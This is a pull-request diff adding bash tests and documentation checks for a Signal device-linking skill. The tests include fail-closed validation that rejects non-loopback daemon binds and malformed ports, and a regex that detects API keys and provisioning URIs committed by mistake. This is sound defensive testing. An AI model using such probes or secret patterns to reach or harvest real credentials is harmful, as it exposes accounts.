   pass "phone set + not-linked proceeds past probe (no spurious 'refusing to mint')"
+fi
+
+reset_logs
+rm -f "$SANDBOX/linked-after-mint"
+MOCK_SYSTEMD_MINT=1 MOCK_LINKED_NUMBER="" run_ss \
+  --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "signal-setup complete for local"; then
+  pass "local mint path renders QR, verifies linkage, and completes"
+else
+  fail "local mint path must complete with mocked systemd-run/linkage (rc=$RC): $OUT"
+fi
+if grep -q 'ANSIUTF8i' "$QR_LOG" 2>/dev/null; then
+  pass "local mint path renders the QR with ANSIUTF8i"
+else
+  fail "local mint path must render ANSIUTF8i QR (qr.calls: $(cat "$QR_LOG" 2>/dev/null))"
+fi
+
+reset_logs
+rm -f "$SANDBOX/linked-after-mint"
+MOCK_REMOTE_MINT=1 MOCK_LINKED_NUMBER="" run_ss \
+  --host devvm --phone +15551234567 --resource-group rysweet-linux-vm-pool --no-daemon -y
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "signal-setup complete for devvm"; then
+  pass "remote mint path extracts URI, renders QR, verifies linkage, and completes"
+else
+  fail "remote mint path must complete with mocked az/linkage (rc=$RC): $OUT"
+fi
+if grep -q 'ANSIUTF8i' "$QR_LOG" 2>/dev/null; then
+  pass "remote mint path renders the QR with ANSIUTF8i"
+else
+  fail "remote mint path must render ANSIUTF8i QR (qr.calls: $(cat "$QR_LOG" 2>/dev/null))"
 fi
 
 # ─── Test 8: mode auto-detection ────────────────────────────────────────────

--- a/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
@@ -67,6 +67,7 @@ for a in "$@"; do
   if [ "$a" = "listAccounts" ]; then
     if [ -n "${MOCK_LINKED_NUMBER:-}" ]; then
       echo "Number: ${MOCK_LINKED_NUMBER}"
+      [ -n "${MOCK_EXTRA_NUMBER:-}" ] && echo "Number: ${MOCK_EXTRA_NUMBER}"
     elif [ -n "${MOCK_LINK_AFTER_MINT_FILE:-}" ] && [ -f "$MOCK_LINK_AFTER_MINT_FILE" ]; then
       echo "Number: +15551234567"
     fi
@@ -130,6 +131,7 @@ case "\$script" in
     [ -n "\${MOCK_AZ_INNER_FAIL_LIST:-}" ] && { echo "__SIGNAL_CLI_FAILED__1"; echo "mock signal-cli listAccounts failure"; exit 0; }
     if [ -n "\${MOCK_LINKED_NUMBER:-}" ]; then
       echo "Number: \${MOCK_LINKED_NUMBER}"
+      [ -n "\${MOCK_EXTRA_NUMBER:-}" ] && echo "Number: \${MOCK_EXTRA_NUMBER}"
     elif [ -n "\${MOCK_LINK_AFTER_MINT_FILE:-}" ] && [ -f "\$MOCK_LINK_AFTER_MINT_FILE" ]; then
       echo "Number: +15551234567"
     fi ;;
@@ -176,12 +178,14 @@ run_ss() {
     HOME="$SANDBOX" \
     PATH="$MOCKBIN" \
     MOCK_LINKED_NUMBER="${MOCK_LINKED_NUMBER:-}" \
+    MOCK_EXTRA_NUMBER="${MOCK_EXTRA_NUMBER:-}" \
     MOCK_AZ_FAIL_LIST="${MOCK_AZ_FAIL_LIST:-}" \
     MOCK_AZ_INNER_FAIL_LIST="${MOCK_AZ_INNER_FAIL_LIST:-}" \
     MOCK_SYSTEMD_MINT="${MOCK_SYSTEMD_MINT:-}" \
     MOCK_REMOTE_MINT="${MOCK_REMOTE_MINT:-}" \
     MOCK_LINK_AFTER_MINT_FILE="$SANDBOX/linked-after-mint" \
     SIGNAL_SETUP_TEST_DAEMON_UP="${SIGNAL_SETUP_TEST_DAEMON_UP:-}" \
+    SIGNAL_SETUP_DAEMON_TCP="${SIGNAL_SETUP_DAEMON_TCP:-}" \
     /bin/bash "$IMPL" "$@" 2>&1)"
   RC=$?
 }
@@ -288,6 +292,98 @@ else
   fail "--phone with metacharacters must be rejected (rc=$RC)"
 fi
 
+# ─── Test 4b: SIGNAL_SETUP_DAEMON_TCP fails closed (the loopback invariant) ──
+# The signal-cli JSON-RPC daemon is UNAUTHENTICATED, so its ONLY security
+# boundary is the network binding (SECURITY.md §6/§10.4, threat T5). The
+# SIGNAL_SETUP_DAEMON_TCP value flows verbatim into `daemon --tcp`, /dev/tcp
+# probes, and nc connections on BOTH the local and remote paths. A regression
+# that accepted a routable host or an out-of-range port would expose full
+# send/receive control of the linked account to the network while still
+# shipping green — this block is the guard that makes such a regression fail.
+# Validation runs before any prereq/mint side effect, so a rejected endpoint
+# must NEVER render a QR.
+echo ""
+echo "Test 4b: SIGNAL_SETUP_DAEMON_TCP fails closed (loopback host + port range)"
+
+# host must be loopback: a wildcard bind is the exact off-box exposure T5 warns
+# about and must be rejected with a loopback message.
+reset_logs
+SIGNAL_SETUP_DAEMON_TCP='0.0.0.0:7583' MOCK_LINKED_NUMBER="+15551234567" \
+  run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "loopback"; then
+  pass "wildcard 0.0.0.0 daemon bind rejected (loopback-only)"
+else
+  fail "0.0.0.0 daemon bind must be rejected as non-loopback (rc=$RC): $OUT"
+fi
+if [[ ! -s "$QR_LOG" ]]; then
+  pass "no QR rendered for a rejected daemon endpoint"
+else
+  fail "a rejected daemon endpoint must not reach QR rendering"
+fi
+
+# a routable unicast host is equally off-box and must be rejected.
+reset_logs
+SIGNAL_SETUP_DAEMON_TCP='1.2.3.4:7583' MOCK_LINKED_NUMBER="+15551234567" \
+  run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "loopback"; then
+  pass "routable 1.2.3.4 daemon bind rejected (loopback-only)"
+else
+  fail "routable daemon host must be rejected as non-loopback (rc=$RC): $OUT"
+fi
+
+# IPv6 / multi-colon forms are refused: they would also break the single-colon
+# host:port parsing daemon_up()/nc rely on, silently mis-targeting the probe.
+reset_logs
+SIGNAL_SETUP_DAEMON_TCP='[::1]:7583' MOCK_LINKED_NUMBER="+15551234567" \
+  run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "host:port"; then
+  pass "IPv6/multi-colon daemon endpoint rejected (single-colon invariant)"
+else
+  fail "IPv6/multi-colon daemon endpoint must be rejected (rc=$RC): $OUT"
+fi
+
+# port above 65535 must be rejected even on a loopback host.
+reset_logs
+SIGNAL_SETUP_DAEMON_TCP='127.0.0.1:99999' MOCK_LINKED_NUMBER="+15551234567" \
+  run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "out of range"; then
+  pass "out-of-range daemon port (99999) rejected"
+else
+  fail "out-of-range daemon port must be rejected (rc=$RC): $OUT"
+fi
+
+# port 0 is not a valid TCP port and must be rejected by the charset rule.
+reset_logs
+SIGNAL_SETUP_DAEMON_TCP='127.0.0.1:0' MOCK_LINKED_NUMBER="+15551234567" \
+  run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "invalid"; then
+  pass "daemon port 0 rejected"
+else
+  fail "daemon port 0 must be rejected (rc=$RC): $OUT"
+fi
+
+# a non-numeric port must be rejected (no injection into the port field).
+reset_logs
+SIGNAL_SETUP_DAEMON_TCP='127.0.0.1:7a' MOCK_LINKED_NUMBER="+15551234567" \
+  run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "invalid"; then
+  pass "non-numeric daemon port rejected"
+else
+  fail "non-numeric daemon port must be rejected (rc=$RC): $OUT"
+fi
+
+# POSITIVE: a valid loopback endpoint with a non-default port passes validation.
+# Paired with an already-linked host + --no-daemon so we exit cleanly (proving
+# the value was accepted, not merely that the daemon step was skipped).
+reset_logs
+SIGNAL_SETUP_DAEMON_TCP='localhost:7600' MOCK_LINKED_NUMBER="+15551234567" \
+  run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "already linked"; then
+  pass "valid loopback endpoint (localhost:7600) accepted"
+else
+  fail "a valid loopback daemon endpoint must be accepted (rc=$RC): $OUT"
+fi
+
 # ─── Test 5: valid inputs pass validation (reach prereqs/idempotency) ───────
 echo ""
 echo "Test 5: valid inputs pass validation"
@@ -318,6 +414,15 @@ if [[ ! -s "$QR_LOG" ]]; then
   pass "no QR rendered when already linked (idempotent)"
 else
   fail "an already-linked host must NOT render a QR (found: $(cat "$QR_LOG"))"
+fi
+
+reset_logs
+MOCK_LINKED_NUMBER="+15551234567" MOCK_EXTRA_NUMBER="+15557654321" run_ss \
+  --host local --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "Multiple Signal accounts"; then
+  pass "multiple linked accounts without --phone abort instead of choosing one silently"
+else
+  fail "multiple accounts without --phone must require explicit selection (rc=$RC): $OUT"
 fi
 
 # ─── Test 6b: idempotency must NOT match on a phone-number PREFIX ────────────

--- a/amplifier-bundle/skills/signal-setup/tests/test_skill_structure.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/test_skill_structure.sh
@@ -1,0 +1,470 @@
+#!/usr/bin/env bash
+# TDD contract tests for the `signal-setup` skill — structure + documentation +
+# script-source invariants.
+#
+# Run: bash amplifier-bundle/skills/signal-setup/tests/test_skill_structure.sh
+#
+# These tests are the executable specification for the skill. They lock every
+# hard-won, verified learning the skill exists to preserve so it can never be
+# silently dropped by a future edit:
+#
+#   1. the ~60s device-link window (server close code 1001);
+#   2. ANSIUTF8i (inverted) QR rendering for DARK terminals;
+#   3. systemd-run persistence (transient unit, remote via az run-command);
+#   4. NEVER routing the QR through a Signal message/attachment (the deprecated
+#      relay/daemon slow path that blew the 60s window).
+#
+# Plus prerequisites, linkage-verification signals, the daemon/self-group
+# post-test, the azlin/bastion operational gotchas, idempotency, the --host
+# contract, and the security model. Written test-first: each assertion names
+# exactly which part of the contract is unmet when it fails.
+#
+# Self-contained: no network, no build, no signal-cli. Follows the grep-based
+# pattern already used by pr-guide / code-atlas / code-philosophy in this repo.
+
+set -uo pipefail
+
+PASS=0
+FAIL=0
+pass() { echo "  PASS: $1"; PASS=$((PASS + 1)); }
+fail() { echo "  FAIL: $1"; FAIL=$((FAIL + 1)); }
+
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+SKILL_DIR="$(dirname "$SCRIPT_DIR")"
+SKILL_FILE="$SKILL_DIR/SKILL.md"
+SECURITY_FILE="$SKILL_DIR/SECURITY.md"
+IMPL="$SKILL_DIR/scripts/signal-setup.sh"
+
+# grep helpers (case-insensitive by default; _f = fixed string; _cs = cased).
+g()   { grep -qiE -- "$1" "$2" 2>/dev/null; }
+gf()  { grep -qiF -- "$1" "$2" 2>/dev/null; }
+gfc() { grep -qF  -- "$1" "$2" 2>/dev/null; }
+
+echo "═══════════════════════════════════════════════════════"
+echo "  Test Suite: signal-setup — Structure & Documentation"
+echo "═══════════════════════════════════════════════════════"
+
+# ─── Test 1: Required files exist and script is executable ───────────────────
+echo ""
+echo "Test 1: Required files exist"
+
+if [[ -f "$SKILL_FILE" ]]; then
+  pass "SKILL.md exists"
+else
+  fail "SKILL.md not found at $SKILL_FILE"
+  echo "Results: $PASS passed, $FAIL failed"; exit 1
+fi
+
+if [[ -f "$IMPL" ]]; then
+  pass "scripts/signal-setup.sh exists"
+else
+  fail "scripts/signal-setup.sh not found at $IMPL"
+  echo "Results: $PASS passed, $FAIL failed"; exit 1
+fi
+
+if [[ -x "$IMPL" ]]; then
+  pass "scripts/signal-setup.sh is executable"
+else
+  fail "scripts/signal-setup.sh must be executable (chmod +x)"
+fi
+
+if [[ -f "$SECURITY_FILE" ]]; then
+  pass "SECURITY.md exists"
+else
+  fail "SECURITY.md not found at $SECURITY_FILE"
+fi
+
+# ─── Test 2: Frontmatter — name + description ───────────────────────────────
+echo ""
+echo "Test 2: YAML frontmatter identifies the skill"
+
+if [[ "$(head -1 "$SKILL_FILE")" == "---" ]]; then
+  pass "frontmatter starts with --- on the first byte"
+else
+  fail "frontmatter: first line must be '---'"
+fi
+
+FRONTMATTER="$(awk 'NR==1 && $0=="---"{f=1; next} f && $0=="---"{exit} f{print}' "$SKILL_FILE")"
+
+if echo "$FRONTMATTER" | grep -qE "^name:[[:space:]]*signal-setup[[:space:]]*$"; then
+  pass "frontmatter: name is exactly 'signal-setup'"
+else
+  fail "frontmatter: name must be exactly 'signal-setup'"
+fi
+
+if echo "$FRONTMATTER" | grep -qE "^description:"; then
+  pass "frontmatter: description field present"
+else
+  fail "frontmatter: description field missing"
+fi
+
+# Description must carry the discovery trigger keywords and both host modes.
+for kw in "Signal" "link" "amplihack"; do
+  if echo "$FRONTMATTER" | grep -qiF "$kw"; then
+    pass "description contains trigger keyword: '$kw'"
+  else
+    fail "description missing trigger keyword: '$kw'"
+  fi
+done
+
+if echo "$FRONTMATTER" | grep -qiF "local" && echo "$FRONTMATTER" | grep -qiE "remote|azlin"; then
+  pass "description mentions both local and remote (azlin) hosts"
+else
+  fail "description must mention both local and remote (azlin VM) hosts"
+fi
+
+# ─── Test 3: HARD-WON FACT #1 — the ~60s window / close code 1001 ───────────
+echo ""
+echo "Test 3: FACT #1 — the ~60-second device-link window (close code 1001)"
+
+if gf "60" "$SKILL_FILE" && ( g "second" "$SKILL_FILE" || gf "60s" "$SKILL_FILE" || g "window" "$SKILL_FILE" ); then
+  pass "documents the ~60-second window"
+else
+  fail "must document the ~60-second device-link window"
+fi
+
+if gf "1001" "$SKILL_FILE"; then
+  pass "cites the server websocket close code 1001"
+else
+  fail "must cite websocket server close code 1001 (the verified root cause)"
+fi
+
+if g "chat.signal.org" "$SKILL_FILE" || g "websocket|provisioning" "$SKILL_FILE"; then
+  pass "identifies the provisioning websocket as the mechanism"
+else
+  fail "must identify the provisioning websocket (chat.signal.org) mechanism"
+fi
+
+if gf "invalid response from server" "$SKILL_FILE"; then
+  pass "documents the 'invalid response from server' expiry symptom"
+else
+  fail "must document the 'invalid response from server' expiry symptom"
+fi
+
+# The advertised window must be under the hard 60s ceiling.
+if grep -qE 'WINDOW_SECONDS=([1-5][0-9])\b' "$IMPL"; then
+  pass "script advertises a window strictly under 60s (safety margin)"
+else
+  fail "script WINDOW_SECONDS must be < 60 (a hair under the 60s ceiling)"
+fi
+
+# ─── Test 4: HARD-WON FACT #2 — ANSIUTF8i inverted for dark terminals ───────
+echo ""
+echo "Test 4: FACT #2 — ANSIUTF8i (inverted) for dark terminals"
+
+if gf "ANSIUTF8i" "$SKILL_FILE"; then
+  pass "SKILL.md names the ANSIUTF8i render mode"
+else
+  fail "SKILL.md must name 'ANSIUTF8i'"
+fi
+
+if g "invert" "$SKILL_FILE" && g "dark" "$SKILL_FILE"; then
+  pass "explains inverted rendering is required for dark terminals"
+else
+  fail "must explain ANSIUTF8i is inverted and required for dark terminals"
+fi
+
+# The plain (non-inverted) variant must be called out as the failure mode.
+if gf "ANSIUTF8 " "$SKILL_FILE" || g "dark-on-dark|invisible|unscannable" "$SKILL_FILE"; then
+  pass "warns plain ANSIUTF8 is dark-on-dark / invisible on dark terminals"
+else
+  fail "must warn that plain ANSIUTF8 is invisible on dark backgrounds"
+fi
+
+# ─── Test 5: HARD-WON FACT #3 — systemd-run persistence ─────────────────────
+echo ""
+echo "Test 5: FACT #3 — systemd-run transient-unit persistence"
+
+if gf "systemd-run" "$SKILL_FILE"; then
+  pass "documents launching the link under systemd-run"
+else
+  fail "must document systemd-run for the persistent link process"
+fi
+
+if g "transient|survive|persist" "$SKILL_FILE"; then
+  pass "explains the transient unit survives the launching shell"
+else
+  fail "must explain the transient unit survives the launching shell"
+fi
+
+if gf "az vm run-command" "$SKILL_FILE"; then
+  pass "remote hosts launch systemd-run via az vm run-command"
+else
+  fail "must document remote launch via az vm run-command"
+fi
+
+if gfc "--uid=azureuser" "$SKILL_FILE"; then
+  pass "documents --uid=azureuser (run-command runs as root)"
+else
+  fail "must document --uid=azureuser so the account lands under azureuser"
+fi
+
+# ─── Test 6: HARD-WON FACT #4 — never route the QR through Signal ───────────
+echo ""
+echo "Test 6: FACT #4 — never deliver the QR via a Signal message/attachment"
+
+if g "never" "$SKILL_FILE" && g "signal (message|attachment)|through signal|via signal" "$SKILL_FILE"; then
+  pass "states NEVER route the QR through a Signal message/attachment"
+else
+  fail "must state the QR is NEVER delivered as a Signal message/attachment"
+fi
+
+if g "relay|daemon delivery|40-?60" "$SKILL_FILE" && g "deprecated|slow path|do not" "$SKILL_FILE"; then
+  pass "labels the relay/daemon-delivery path as the deprecated slow path"
+else
+  fail "must label relay/daemon QR delivery as the deprecated slow path"
+fi
+
+if g "scan screen|link new device" "$SKILL_FILE"; then
+  pass "requires the user to be on the scan screen before minting"
+else
+  fail "must require the user to be on the scan screen before minting"
+fi
+
+# ─── Test 7: Prerequisites ──────────────────────────────────────────────────
+echo ""
+echo "Test 7: Prerequisites are documented"
+
+if gf "signal-cli" "$SKILL_FILE" && gf "0.14.5" "$SKILL_FILE"; then
+  pass "requires signal-cli (known-good 0.14.5)"
+else
+  fail "must require signal-cli 0.14.5 (known-good version)"
+fi
+
+if gf "qrencode" "$SKILL_FILE"; then
+  pass "requires qrencode"
+else
+  fail "must require qrencode"
+fi
+
+if g "\baz\b|az cli|az vm" "$SKILL_FILE"; then
+  pass "requires the az CLI for remote hosts"
+else
+  fail "must require the az CLI for remote hosts"
+fi
+
+if gf ".local/bin/signal-cli" "$SKILL_FILE"; then
+  pass "documents the ~/.local/bin/signal-cli install location"
+else
+  fail "must document the ~/.local/bin/signal-cli symlink location"
+fi
+
+# ─── Test 8: Linkage-verification signals ───────────────────────────────────
+echo ""
+echo "Test 8: Linkage-verification signals are documented"
+
+if gf "listAccounts" "$SKILL_FILE" && gf "Number:" "$SKILL_FILE"; then
+  pass "verifies via listAccounts / 'Number: +<phone>'"
+else
+  fail "must verify linkage via listAccounts showing 'Number: +<phone>'"
+fi
+
+if gf "Associated with" "$SKILL_FILE" && gf "Finishing new device registration" "$SKILL_FILE"; then
+  pass "documents the trace-log success markers"
+else
+  fail "must document 'Associated with:' + 'Finishing new device registration'"
+fi
+
+if g "inactive|exits" "$SKILL_FILE"; then
+  pass "notes the transient unit goes inactive on success"
+else
+  fail "must note the systemd unit exits (inactive) on success"
+fi
+
+# ─── Test 9: Daemon + self-group + post-test ────────────────────────────────
+echo ""
+echo "Test 9: Daemon + self-group + post-test are documented"
+
+if gf "127.0.0.1:7583" "$SKILL_FILE"; then
+  pass "JSON-RPC daemon binds 127.0.0.1:7583"
+else
+  fail "must document the JSON-RPC daemon on 127.0.0.1:7583"
+fi
+
+if gf "updateGroup" "$SKILL_FILE" && gf "groupId" "$SKILL_FILE"; then
+  pass "creates/verifies the self-group via updateGroup -> groupId"
+else
+  fail "must document updateGroup -> groupId for the self-group"
+fi
+
+if gfc '"results":[]' "$SKILL_FILE" && g "empty|success|normal|expected" "$SKILL_FILE"; then
+  pass "documents empty results:[] is normal success for a self-group"
+else
+  fail "must document that {\"results\":[],...} is success for a self-group"
+fi
+
+# ─── Test 10: Operational gotchas (azlin / bastion) ─────────────────────────
+echo ""
+echo "Test 10: azlin / bastion operational gotchas"
+
+if g "SIGPIPE|broken pipe|SIGABRT|core-?dump" "$SKILL_FILE"; then
+  pass "warns azlin aborts (SIGABRT/core-dump) on broken pipe (SIGPIPE)"
+else
+  fail "must warn azlin aborts on SIGPIPE (never pipe into grep -q)"
+fi
+
+if g "grep -q" "$SKILL_FILE" || g "capture .*(full|output) first|early-closing" "$SKILL_FILE"; then
+  pass "instructs capturing full output before filtering"
+else
+  fail "must instruct capturing full output first (no early-closing consumer)"
+fi
+
+if g "one bastion|single bastion|concurrent|one .* session at a time" "$SKILL_FILE"; then
+  pass "warns only ONE bastion session per host at a time"
+else
+  fail "must warn only one bastion/azlin session per host at a time"
+fi
+
+if gf "rysweet-linux-vm-pool" "$SKILL_FILE" && gfc "--no-tmux" "$SKILL_FILE"; then
+  pass "documents the azlin connect invocation form"
+else
+  fail "must document 'azlin connect <host> --resource-group ... --no-tmux -y --'"
+fi
+
+# ─── Test 11: Idempotency + --host contract ─────────────────────────────────
+echo ""
+echo "Test 11: Idempotency and the --host contract"
+
+if g "idempotent|already linked|nothing to do" "$SKILL_FILE"; then
+  pass "documents idempotent behavior (skip when already linked)"
+else
+  fail "must document idempotent behavior"
+fi
+
+if gfc "--host" "$SKILL_FILE"; then
+  pass "documents the --host argument"
+else
+  fail "must document the --host argument (local name or remote azlin VM)"
+fi
+
+# ─── Test 12: Security model ────────────────────────────────────────────────
+echo ""
+echo "Test 12: Security model"
+
+if gfc "UMask=0077" "$SECURITY_FILE"; then
+  pass "SECURITY.md pins systemd unit UMask=0077 for secret files"
+else
+  fail "SECURITY.md must document --property=UMask=0077 for the link secrets"
+fi
+
+if gf "0600" "$SECURITY_FILE"; then
+  pass "SECURITY.md requires 0600 on the link URI / trace log"
+else
+  fail "SECURITY.md must require 0600 permissions on secret temp files"
+fi
+
+if gf "127.0.0.1" "$SECURITY_FILE" && g "loopback|localhost only|local only" "$SECURITY_FILE"; then
+  pass "SECURITY.md documents loopback-only daemon binding"
+else
+  fail "SECURITY.md must document the loopback-only daemon bind"
+fi
+
+if g "allowlist|validation|injection" "$SECURITY_FILE"; then
+  pass "SECURITY.md documents input-validation / injection defense"
+else
+  fail "SECURITY.md must document input validation against injection"
+fi
+
+# ─── Test 13: SKILL.md is a substantive index ───────────────────────────────
+echo ""
+echo "Test 13: SKILL.md size sanity"
+
+SKILL_LINES="$(wc -l <"$SKILL_FILE")"
+if [[ "$SKILL_LINES" -ge 60 ]]; then
+  pass "SKILL.md is substantive ($SKILL_LINES lines)"
+else
+  fail "SKILL.md is only $SKILL_LINES lines — likely incomplete"
+fi
+
+# ─── Test 14: Script-source invariants ──────────────────────────────────────
+# The SKILL.md documents the facts; these assertions prove the *implementation*
+# actually encodes them, so docs and code cannot drift apart.
+echo ""
+echo "Test 14: Script encodes the invariants it documents"
+
+if gf "set -uo pipefail" "$IMPL"; then
+  pass "script uses 'set -uo pipefail' (strict-ish mode, no -e footguns)"
+else
+  fail "script must set -uo pipefail"
+fi
+
+# QR MUST be rendered with the inverted ANSIUTF8i mode.
+if grep -qE 'qrencode[^\n]*-t[[:space:]]+ANSIUTF8i' "$IMPL"; then
+  pass "qrencode is invoked with '-t ANSIUTF8i'"
+else
+  fail "qrencode must be invoked with -t ANSIUTF8i (inverted)"
+fi
+
+# NEVER route the QR through Signal: the sgnl:// URI must never be sent.
+if grep -qE 'send[^\n]*sgnl://' "$IMPL"; then
+  fail "the sgnl:// link URI must NEVER be passed to a Signal 'send'"
+else
+  pass "the link URI is never passed to a Signal send (terminal-only delivery)"
+fi
+
+# The remote mint must run under systemd-run with UMask pinned, as root->azureuser.
+if grep -qc 'property=UMask=0077' "$IMPL" >/dev/null && [[ "$(grep -c 'property=UMask=0077' "$IMPL")" -ge 2 ]]; then
+  pass "both (local+remote) systemd-run calls pin --property=UMask=0077"
+else
+  fail "both systemd-run invocations must pin --property=UMask=0077"
+fi
+
+if gfc "--uid=azureuser" "$IMPL" && gf "az vm run-command" "$IMPL"; then
+  pass "remote path uses az vm run-command + --uid=azureuser"
+else
+  fail "remote path must use az vm run-command with --uid=azureuser"
+fi
+
+# Strict E.164 phone validation guards the injection surface.
+if grep -qE '\^\\\+\[1-9\]' "$IMPL" || grep -qF '^\+[1-9][0-9]' "$IMPL"; then
+  pass "phone is validated against a strict E.164 pattern"
+else
+  fail "phone must be validated against a strict E.164 pattern"
+fi
+
+# An allowlist validate() helper must exist and fail closed via die().
+if grep -qE '^validate\(\)' "$IMPL" && gf "die" "$IMPL"; then
+  pass "validate() allowlist helper fails closed via die()"
+else
+  fail "must have a validate() allowlist helper that fails closed (die)"
+fi
+
+# Daemon post-test contract encoded in the script.
+if gf "daemon --tcp" "$IMPL" && gf "127.0.0.1:7583" "$IMPL"; then
+  pass "script starts the daemon on 127.0.0.1:7583"
+else
+  fail "script must start the JSON-RPC daemon on 127.0.0.1:7583"
+fi
+
+if gf "updateGroup" "$IMPL" && grep -qF '"results":\[\]' "$IMPL"; then
+  pass "script ensures the self-group and treats results:[] as success"
+else
+  fail "script must ensure the self-group and treat results:[] as success"
+fi
+
+# ─── Test 15: No leaked secrets in skill files ──────────────────────────────
+echo ""
+echo "Test 15: No leaked secrets"
+
+if grep -REq "(sk-[A-Za-z0-9]{20,}|ghp_[A-Za-z0-9]{20,}|xoxb-|AKIA[0-9A-Z]{16})" \
+     "$SKILL_FILE" "$SECURITY_FILE" "$IMPL" 2>/dev/null; then
+  fail "skill files may contain secrets / API keys"
+else
+  pass "no secrets detected in skill files"
+fi
+
+# A real sgnl:// provisioning URI must never be committed (only placeholders).
+if grep -qE 'sgnl://linkdevice\?[A-Za-z0-9%]{20,}' "$SKILL_FILE" "$IMPL" 2>/dev/null; then
+  fail "a concrete sgnl:// provisioning URI appears to be committed"
+else
+  pass "no concrete sgnl:// provisioning URI is committed"
+fi
+
+# ─── Summary ─────────────────────────────────────────────────────────────────
+echo ""
+echo "═══════════════════════════════"
+echo "Results: $PASS passed, $FAIL failed"
+echo "═══════════════════════════════"
+
+[[ "$FAIL" -gt 0 ]] && exit 1
+exit 0

--- a/docs/skills/SKILL_CATALOG.md
+++ b/docs/skills/SKILL_CATALOG.md
@@ -5,8 +5,8 @@ Those bundled `SKILL.md` files are the install-time source of truth.
 
 ## Summary
 
-- **Unique bundled skill names:** 121
-- **Skill definition files:** 121
+- **Unique bundled skill names:** 122
+- **Skill definition files:** 122
 
 ## Bundled Skills
 
@@ -113,6 +113,7 @@ Those bundled `SKILL.md` files are the install-time source of truth.
 | `session-to-agent` | `session-to-agent/SKILL.md` |
 | `setting-up-projects` | `development/setting-up-projects/SKILL.md` |
 | `shadow-testing` | `shadow-testing/SKILL.md` |
+| `signal-setup` | `signal-setup/SKILL.md` |
 | `silent-degradation-audit` | `silent-degradation-audit/SKILL.md` |
 | `skill-builder` | `skill-builder/SKILL.md` |
 | `smart-test` | `smart-test/SKILL.md` |

--- a/tests/scenarios/signal-setup-skill.yaml
+++ b/tests/scenarios/signal-setup-skill.yaml
@@ -1,0 +1,16 @@
+name: signal-setup-skill
+description: |
+  Outside-in coverage for the signal-setup skill. Exercises the user-facing
+  command contract through the executable skill tests: help/argument handling,
+  fail-closed validation, idempotent local and remote linked-host paths,
+  zero-QR rendering on no-op, and remote daemon/self-group/post-test behavior.
+type: cli
+tags: [signal, skill, outside-in, merge-ready]
+
+scenarios:
+  - name: signal-setup-user-facing-flow
+    description: The signal-setup skill behaves correctly for local and remote operators without touching real Signal, systemd, or Azure.
+    steps:
+      - type: command
+        command: "bash -lc 'mkdir -p .local-test-tmp && TMPDIR=\"$PWD/.local-test-tmp\" bash amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh; rc=$?; rm -rf .local-test-tmp; exit $rc'"
+        expected_exit_code: 0


### PR DESCRIPTION
## Summary

Adds a reusable, idempotent amplihack skill **`signal-setup`** for end-to-end Signal device linking on a local host or remote azlin Azure VM.

Primary files:
- `amplifier-bundle/skills/signal-setup/SKILL.md`
- `amplifier-bundle/skills/signal-setup/README.md`
- `amplifier-bundle/skills/signal-setup/SECURITY.md`
- `amplifier-bundle/skills/signal-setup/scripts/signal-setup.sh`
- `tests/scenarios/signal-setup-skill.yaml`

The flow is: prereq check → confirm phone scan screen open → mint link under `systemd-run` → render **ANSIUTF8i** QR directly in-terminal → verify linkage → optionally start JSON-RPC daemon, ensure self-group, and post-test.

## Duplicate PR #1001 reconciliation

- Absorbed the two unique useful additions from duplicate PR #1001 into this PR: `amplifier-bundle/skills/signal-setup/README.md` and `docs/skills/SKILL_CATALOG.md`.
- README was adapted to match this PR's actual `SKILL.md` and `scripts/signal-setup.sh` behavior.
- Catalog generator check: searched the repository for a SKILL_CATALOG generator; no generator script was found, so the catalog was updated in the existing format with `signal-setup` and counts bumped from 121 to 122.
- Explicitly did **not** import #1001's `Cargo.toml`, `Cargo.lock`, or `package.json` version bumps.

## Merge readiness evidence

- Platform: GitHub
- PR: #993 — https://github.com/rysweet/amplihack-rs/pull/993
- Source → target: `feat/signal-setup-skill` → `main`
- Current head revision: `0af6da63a9b8ea7c8be4ce2e7d5b9a84c2ab0f31` (up to date with latest `origin/main`, **0 commits behind**)
- Merge state: `CLEAN`; draft: no.

### QA / outside-in scenarios

- Scenario file: `tests/scenarios/signal-setup-skill.yaml` (`type: cli`, tags `outside-in, merge-ready`).
- Direct scenario command executed:
  `bash amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh`
  → **exit 0; 99 passing assertions, 0 failures** (`ALL SUITES PASSED`; anti-hollow-pass floor 40).
- Coverage includes: help/argument validation, fail-closed input validation, idempotent local/remote already-linked behavior, remote `az vm run-command`, daemon/self-group/post-test paths, missing prerequisites, exact phone matching, remote failure detection, loopback daemon endpoint validation, and QR rendering with `ANSIUTF8i`.
- Tooling note: `gadugi-test` is unavailable in this environment, so validate/run could not be invoked by name; the scenario's hermetic command was executed directly and passed.

### Documentation

- Docs updated: `SKILL.md`, `README.md`, `SECURITY.md`, and `docs/skills/SKILL_CATALOG.md`.
- User-facing quick start and operational invariants are documented, including the ~60s Signal provisioning window, inverted terminal QR rendering, `systemd-run` persistence, and never relaying the QR through Signal.

### Quality / crusty review

Crusty-old-engineer review of `gh pr diff 993` found substantive issues and they were fixed on-branch: fail-closed account probes, remote inner-failure detection, multi-account safety, current UID/HOME local minting, loopback daemon validation, JSON escaping, daemon/post-test failure propagation, retained failure diagnostics, and the duplicate PR #1001 README/catalog gap. Final pass found no outstanding substantive correctness/security issues.

